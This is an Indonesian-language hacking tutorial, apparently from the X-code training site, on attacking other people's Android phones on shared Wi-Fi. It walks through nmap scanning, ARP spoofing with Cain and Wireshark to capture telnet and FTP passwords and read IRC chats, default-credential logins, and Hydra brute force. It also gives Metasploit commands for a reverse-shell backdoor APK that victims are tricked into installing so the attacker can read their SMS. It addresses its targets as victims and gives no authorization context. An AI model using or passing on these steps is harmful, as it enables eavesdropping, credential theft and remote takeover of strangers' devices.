Teknik-teknik serangan ke Android

Penulis : Kurniawan (founder X-code)

http://xcode.or.id

Apa itu Android ?

Android adalah sistem operasi berbasis Linux yang dirancang untuk perangkat seluler
layar sentuh seperti telepon pintar dan komputer tablet

Android untuk HP dan Android umumnya menggunakan processor ARM (Advanced

Risc Machine).

Tool-tool yang dibutuhkan untuk hal-hal yang berhubungan dengan hacking

Android?
Dalam menjalankan teknik-teknik serangan ke Android membutuhkan tool-tool seperti
berikut.

 NMAP
 Cain
 Hydra
 Wireshark

Selain tool diatas juga kamu bisa menambah dengan Kali Linux dan Virtual Box.

Tahapan scanning

 Join ke hotspot area

 Setelah join dan mendapatkan ip address dari DHCP Server maka untuk
mengetahui ip address, subnet mask dan gateway di komputer kamu maka di
command prompt ketik : ipconfig /all
  Setelah mengetahui ip address, subnet mask dan gateway maka install NMAP di
Windows, jika kamu sudah ada Kali Linux maka kamu bisa jalankan langsung
NMAP di Kali Linux
 Disini misalkan ip address kamu 192.168.1.100, subnet mask 255.255.255.0,
maka untuk scan komputer di jaringan, kamu bisa menggunakan perintah : nmap
–sn 192.168.1.1-254
 Pilih target yang ingin kamu scan, misalkan kamu menemukan targetnya
menggunakan ip address 192.168.1.101, maka untuk awal ketik : nmap -p 1-
10000 -v 192.168.1.101
Disini yang dilakukan scan adalah port 1 sampai 10.000, umumnya service-
service yang diinstall di android berada di port 1000 ke atas.
Contoh-contoh hasil dari NMAP
Teknik-teknik serangan ke Android

Setelah kamu mendapatkan ip address target maka kamu bisa memilih ingin menyerang
dengan teknik seperti apa.
 Untuk penyadapan bisa menggunakan teknik ARP Spoofing
 Untuk serangan instant bisa mencoba mengakses service korban dengan
memanfaatkan akses default
 Untuk serangan menebak password secara brutal dan otomatis maka gunakan
teknik Brute Force

Serangan dengan ARP Spoofing

ARP (Address Resolution Protocol ) Spoofing adalah sebuah teknik penyadapan oleh
pihak ketiga yang dilakukan dalam sebuah jaringan LAN.

Penyadapan

Langkah awal terlebih dahulu periksa port dan service android target dengan NMAP.

Untuk disini ARP Spoofing menggunakan Cain. Disini kamu bisa belajar menggunakan
Cain, dalam pencarian di google.com, kamu bisa mendapatkan tutorialnya, disini di
asumsikan kamu sudah bisa menggunakan program cain.

Untuk penyadapan pada protokol yang tidak aman yang kamu temukan di target android
maka umumnya kamu harus memasukkan port target di bagian Filter dan Ports, pilihan
menunya ada di Configuration.

Misal untuk telnet portnya ditambah 1026

 Untuk FTP juga bisa dilakukan, contohnya seperti dibawah ini

Lakukan scanning seperti biasa, disini kamu bisa melihat pada kolom OUI fingerprint
muncul tulisan Lenovo Movile Communication.

Disini kita mengetahui targetnya menggunakan ip address 192.168.1.101

 Pada New ARP Poison Routing pada kolom kiri, diisi komputer pemilik android,
dikolom kanan diisi ip address android yang akan diremote dari komputer pemilik
android.

Setelah dilakukan spoofing, saat dibawah ini pemilik android ingin mengakses telnet
pada android maka passwordnya juga akan dikirim ke komputer penyerang.
Hasil penyadapan telnet ada di bawah ini
Penyadapan pada FTP

Selain telnet, FTP juga bisa disadap passwordnya.

Saat client login melalui port 7272

Hasil dari client berhasil login

Di komputer penyadap, username dan password muncul di Cain

 Mengintip orang chatting

Pengguna chatting IRC di android bisa di sadap di jaringan LAN dengan gabungan
program Cain dan wireshark

Latar belakang

Banyak pengguna IRC di channel-channel kota yang dimana saat mereka online
memanfaatkan jaringan hotspot maka memungkinkan isi chatting dapat disadap.

Lakukan terlebih dahulu ARP Spoofing dengan Cain, disini tidak diberitahukan step by
step, karena caranya sudah ada di materi sebelumnya. Disini ditunjukkan langsung pada
New ARP Poison Routing.

Disini diasumsikan ip address 192.168.1.102 adalah ip address korban. Ip address router

192.168.1.1
Setelah dilakukan ARP Spoofing maka jalankan program wireshark dan lakukan tindakan
penyadapan dengan wireshark

Saat paket sudah masuk, klik kanan pada TCP yang berhubungan dengan IRC

Hasil dari penyadapan

 Serangan memanfaatkan akses default

Serangan memanfaatkan akses default ini untuk target yang menjalankan service namun
masih menggunakan konfigurasi default.

Untuk mengetahui port terbuka maka kamu bisa menggunakan NMAP

FTP Server : port 7272

Username : admin
Password admin123

Wifi Transfer File : Default tanpa password

 Brute force attack

Brute force attack adalah sebuah teknik serangan terhadap sebuah sistem keamanan
komputer yang menggunakan percobaan terhadap semua kunci yang mungkin.

Contoh serangan brute force dengan hydra

hydra -s 1200 -L user.txt -P pass.txt 192.168.1.89 ftp

\
 Hacking android dengan social engineering

Social engineering adalah manipulasi psikologis dari seseorang dalam melakukan aksi
atau menguak suatu informasi rahasia

Dengan social engineering maka kita bisa menuntun target melakukan apa yang kita mau,
disini target dibuat yakin bahwa dirinya itu yang memegang kontrol atas situasi tersebut.

Intinya disini target dibuat untuk merasa bahwa dia telah membuat keputusan yang tepat

Disini kita membuat backdoor. Dengan backdoor ini saat korban menjalankan aplikasi
dengan format APK ini di ponsel atau tablet android miliknya maka ponsel atau tablet
androidnya akan teremote oleh penyerang.

Untuk membuat backdoor maka kita dapat membangunnya dengan memanfaatkan

Metasploit Framework.

Metasploit Framework adalah sebuah platform pengembangan untuk menciptakan alat

keamanan dan eksploitasi.

Praktek

Jalankan Kali Linux, di terminal masukkan seperti dibawah ini, jangan lupa IP address di
ganti

msfpayload android/meterpreter/reverse_tcp
LHOST=192.168.1.100 LPORT=4444 R > app.apk

LHOST diisikan ip address kamu

Hasilnya adalah kamu akan mendapatkan file app.apk, file ini di jalankan di komputer
target, caranya kamu dapat memanfaatkan social engineering.

Berikutnya jalankan exploit/multi/handler, tujuannya agar korban yang menjalankan file

app.apk langsung menghubungi komputer kamu dan kamu bisa meremotenya, kamu bisa
mendapatkan isi sms dan sebagainya.

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.100 (ip address kamu)
set lport 4444
exploit
Jika targetnya adalah di internet maka set ip address dengan ip address publik, jika
targetnya di jaringan lokal maka set ip address dengan ip address lokal.

X-code Training

Jika ingin belajar lebih seperti Network hacking, web hacking, wireless hacking dan
sebagainya maka klik http://xcode.or.id/training

Jika ingin belajar lebih menyeluruh maka klik http://xcode.or.id/intensif

Jika kamu ingin training online maka klik http://xcode.or.id/trainingonline/